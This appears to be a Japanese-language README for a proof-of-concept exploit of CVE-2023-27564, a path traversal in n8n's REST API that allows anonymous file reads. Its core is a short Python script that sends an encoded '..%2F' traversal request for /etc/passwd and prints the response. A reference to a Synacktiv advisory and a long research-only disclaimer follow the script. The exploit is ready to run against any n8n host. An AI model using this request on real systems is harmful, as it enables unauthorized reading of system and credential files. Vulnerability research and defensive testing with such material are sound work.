
CVE-2023-27564 の概念実証エクスプロイト。REST API のパス・トラバーサルを介して n8n で匿名ファイル読み取りを可能にします。セキュリティ研究および脆弱性評価を目的としています。
この脆弱性により、n8n で匿名のファイル読み取りが可能になります。
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
このリポジトリで提供される概念実証 (PoC) は、教育およびセキュリティ研究目的のみを対象としています。情報とコードは、サイバーセキュリティ専門家や研究者がソフトウェアやシステムの脆弱性を理解し、防御するために使用されることを意図しています。この PoC、関連情報、またはコードを、事前の相互同意なしにターゲットを攻撃するために使用することは違法であり、固く禁じられています。
この PoC を使用することにより、あなたはそれが実証する脆弱性の潜在的な影響を理解し、責任を持って倫理的に使用することに同意したものとみなされます。この PoC の作成者は、本資料の誤用、または提供された情報やコードの使用によって生じる可能性のある損害について一切の責任を負いません。エンドユーザーは、適用されるすべての地方、州、国、および国際法を遵守する責任があります。
作成者は、このリポジトリに含まれる情報の正確性と信頼性を確保するためにあらゆる努力を払っています。ただし、情報は「現状のまま」提供され、いかなる種類の保証もありません。作成者は、含まれる情報の正確性、内容、完全性、合法性、または信頼性について一切の責任または義務を負いません。